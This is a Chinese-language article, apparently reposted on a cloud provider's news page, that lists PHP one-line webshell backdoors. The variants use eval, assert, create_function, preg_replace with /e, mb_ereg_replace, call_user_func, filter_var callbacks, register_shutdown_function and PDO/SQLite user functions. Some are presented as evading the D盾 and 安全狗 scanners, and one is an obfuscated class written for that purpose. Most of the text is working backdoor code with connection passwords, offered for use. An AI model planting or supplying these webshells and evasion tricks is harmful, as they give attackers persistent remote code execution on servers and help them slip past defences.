溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
php任意代碼執行的一句話后門有哪些,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
php任意代碼執行的一句話后門,我們喜歡用的是傳統的eval,php5,7通用。
<?php @eval($_POST['a']) ?>
但由于eval不能拆分,早期也有人喜歡用assert,這樣通過編碼和拆分assert,隱蔽性更高
<?php @assert($_POST['a']) ?>
雖然有人說assert在php7.0及其以上版本被禁用,但實際上并沒有禁用,而是和eval一樣禁止拆分了。
絕大部分一句話后門,都跟這兩個函數(其實不是函數)有關
create_function,它的作用是創建一個匿名函數,在內部也相當于執行了一次eval。php5,7都可用
<?php $st=@create_function('',$_POST['a']);$st();?>/e修飾符,也就是大家熟知的preg_replace。這個則是真的php7用不了了,僅限php5。
<?php @preg_replace('/.*/e',$_POST['a'],'');?>除了preg_replace之外,還有一個和它類似的函數。
<?php @preg_filter('/.*/e',$_POST['a'],'');?>這兩個都是僅限php5的,php7也想用這種方法怎么辦呢?有辦法,php并沒有完全將/e修飾符趕盡殺絕。
<?php @mb_ereg_replace('.*',$_POST['a'],'','ee');?>
<?php @mb_eregi_replace('.*',$_POST['a'],'','ee');?>它們甚至還有別名
<?php @mbereg_replace('.*',$_POST['a'],'','ee');?>
<?php @mberegi_replace('.*',$_POST['a'],'','ee');?>上面這些都開發出來很久了,單純拿這些去繞D盾是很難的,這里也不是來教大家繞D盾的。想繞的話,其實D盾對類的檢測力度不高,自己寫個混淆一點的類,php5用assert拆分,php7用create_function拆分其實就很容易繞過去。舉個例子
//該例子為create_function拆分,php5.3.29和5.2.17測試完不可行,php5.4.45-php7都可行。故php5用assert拆分,php7用create_function拆分這樣最穩
<?php
class create{
public $filter = ['q'=>'_function'];
public $value = '';
public function __construct(){
$this->value = $_POST['a'];
$name=get_class($this).$this->filter['q'];
$st=$name('',$this->value);
$st();
}
}
$a = new create();回調函數的本質是下面這種代碼,以函數作為變量。
<?php $_GET['a']($_GET['b']);?>
比較老的回調后門
URL地址:http://127.0.0.1/1.php 連接密碼:pass
php中call_user_func是執行回調函數的標準方法,這是比較老的后門了:
<?php
call_user_func('assert', $_REQUEST['pass']);<?php
call_user_func_array('assert', array($_REQUEST['pass']));真免殺回調后門(過安全狗,D盾)
URL地址:http://127.0.0.1/1.php?e=assert 連接密碼:pass
<?php
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));<?php
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));<?php $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['pass']);
<?php
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');下面這兩個回調后門,都是依靠php擴展庫(pdo和sqlite3)來實現的:
<?php
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));上面這種sqlite方法是依靠PDO執行的。我們也可以直接調用sqlite3的方法構造回調后門,前提是php5.3以上。
<?php
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();看完上述內容,你們掌握php任意代碼執行的一句話后門有哪些的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
